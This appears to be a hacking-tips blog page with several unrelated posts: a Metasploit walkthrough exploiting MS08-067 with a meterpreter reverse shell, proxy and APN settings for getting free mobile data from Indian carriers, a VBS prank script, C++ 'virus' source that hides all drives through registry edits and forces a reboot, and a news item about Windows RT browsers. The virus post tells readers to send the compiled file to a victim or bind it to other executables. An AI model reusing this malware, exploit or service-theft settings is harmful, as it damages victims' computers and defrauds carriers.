How to hack a remote computer??



















By exploiting the parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service(CVE-2008-4250). Before we jump into the actual exploitation process, let me give more details about this Server Service Vulnerability. 


Details about Server Service Vulnerability(MS08-067):


Microsoft Windows Server service provides support for sharing resources such as files and print services over the network.

The Server service is vulnerable to a remote code-execution vulnerability. The vulnerability is caused due to an error in netapi32.dll when processing directory traversal character sequences in path names. This can be exploited to corrupt stack memory by e.g. sending RPC requests containing specially crafted path names to the Server Service component. The 'NetprPathCanonicalize()' function in the 'netapi32.dll' file is affected.

A malicious request to vulnerable system results in complete compromise of vulnerable computers.

This vulnerability affects Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008. But Attackers require authenticated access on Windows Vista and Server 2008 platforms to exploit this issue.

Exploiting the MS08-067 using Metasploit:

*Requirements*

1. VirtualBox
2. Backtrack 5
3. Target OS(XP)

Step 1:

Create Two Virtual Machine(VM) namely "Target" and "BT5". Install the XP inside Target VM and Backtrack inside BT5. Start the Two VMs.

Step 2: Find the IP address of Target
Open The command prompt in the Target machine(XP). Type "ipconfig" to find the IP address of the Target system.

"I use different method for finding the ip address of victim. For Eg., By sending link that will get the ip details or use Angry IP Scanner."

Step 3: Information Gathering
Now let us collect some information about the Target machine. For this purpose , we are going to use the nmap tool.

Open The Terminal in the BT5 machine(Backtrack) and type "nmap -O 192.168.56.12". Here 192.168.56.12 is IP address of Target machine. If you look at the result, you can find the list of open ports and OS version.

Step 4: Metasploit
Now open the Terminal in the BT5 machine(Backtrack) and Type "msfconsole".

The msfconsole is the most popular interface to the Metasploit Framework. It provides an "all-in-one" centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.

Let us use the Search command to find the exploit modules with the keyword netapi. Type "search netapi". Now you can see the list of modules match with the netapi.

We are going to exploit MS08-067 , so type "use exploit/windows/smb/ms08_067_netapi".

Step 5: Set Payload
As usual, let use the Reverse Tcp Payload for this exploit also. Type "set payload windows/meterpreter/reverse_tcp" in the msfconsole.

Step 6: Options
Type "set LHOST 192.168.56.10". Here 192.168.56.10 is IP address of Backtrack machine. You can find the ip address by typing 'ifconfig' command in the Terminal.

Type "set RHOST 192.168.56.12". Here 192.168.56.12 is IP address of Target machine.

Step 7: Exploiting
Ok, it is time to exploit the vulnerability, type "exploit" in the console. If the exploit is successful, you can see the following result.

Now we can control the remote computer using the meterpreter. For example, typing "screenshot" will grab the screenshot of the victim system.

Preventive Measures:
Update your Windows OS frequently..

All India Working Airtel Free 3G Internet 2012


Hi, Friends this is latest working Free 3G Trick All over India.
Its Working in phone and pc both.

You can download big files (more than 500mb) too with this proxy.

Create new Configuration Settings:-

APN:- airtelgprs.com
PROXY ADD:- 69.10.57.138

port:- 80

home page:- m.twitter.com
or
fb.me (for Gujarat)
or
Any free opening site in your state.
Done.
Enjoy

You can use phone's default browser or in pc too..

Free Unlimited 3G Internet hack for BSNL


Today I came across a BSNL 3G internet hack , so i planned to post it here also. You can surf Free unlimited internet in 3g with this hack.

Requirements:
 

3G supported device
3G activated sim(it is easy to activate 3g in normal sim)
Knowledge to change internet settings

Just change the Internet settings with the following details. BSNL 3G hack setting:

Name :BSNL 3G
Service Type 1 WAP
Gateway IP : 1 10.100.3.2
Port no : 1 : 9209.
Timeout: NEVER
CSD No.1
User Name1: ppp
Password1: ppp123
APN setting:
wapwest.cellone.in
User Name : ppp
Password : ppp123

use this settings and enjoy the free Internet service at 3Mbps speed.
http://10.100.3.2/
10.100.3.2

Trick to type slowly



*Open Notepad.
*Paste the following code in the notepad file:

WScript.Sleep 180000 
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo ”
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re ”
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? ”
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! “

*Save file with any name & with .vbs extension & close it.
Now open the file & see how freakishly slow the messages appear!

C++ Batch Virus code to disable All Hard disk


Hi friends, here i give you give the C++ virus code. Actually Batch code is converted to C++ virus code. If you like you can use it as batch code also..

#include < windows.h > #include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\Hackersgrp.bat" ); /*opening or creating new file with .bat extension*/

write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\Hackersgrp.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; 

}

Copy the above code and paste in notepad
Save the file with .cpp extension
Compile and create .exe file in cpp

*Note:-
Don't run this c++ program, it will attack your system itself.
Copy the created .exe file and send it to your victim. You can also attach it with any other
exe files.

Docomo Hispeed Free Gprs


Here is the newest ip of docomo working with great speed here is the ip. "220.226.181.88" use divein settings with above bal rs.1. For opera use http server as: http://220.226.181.88.server4.operamini.com/

Tested and working in southern states. Try in yours.

Windows 8 operating system will ban Firefox and Chrome

A new version of the Windows 8 operating system could shut out browsers such as Firefox and Chrome, according to Mozilla. Microsoft has been saying all along that x86 apps wouldn't run on Windows on ARM and it explicitly said there would be no third-party code on Windows RT when it announced the details of the platform back in February. 


That's no plugins for IE on the Windows RT desktop as well as no desktop Firefox and Chrome. According to Mozilla, the makers of Firefox, Microsoft is planning to allow only one fully-functioning browser on Windows RT: Microsoft's own Internet Explorer. Writing on the Mozilla blog, Harvey Anderson, general counsel for the company, lashed out at Microsoft for the slight, and called the alleged move "an unwelcome return to the digital dark ages where users and developers didn’t have browser choices."

Why is Mozilla focused on Microsoft? Anderson's answer: Microsoft is a different beast. "The difference here is that Microsoft is using its Windows monopoly power in the OS market to exclude competition in the browser market," Anderson said, possibly referring to Microsoft's dominance of the entire operating system space, not only mobile.

The fully featured version of Firefox will be allowed to run on Intel-based Windows 8 tablets. It's only Windows RT where there will be a problem. Microsoft also declined to comment on Mozilla's accusations.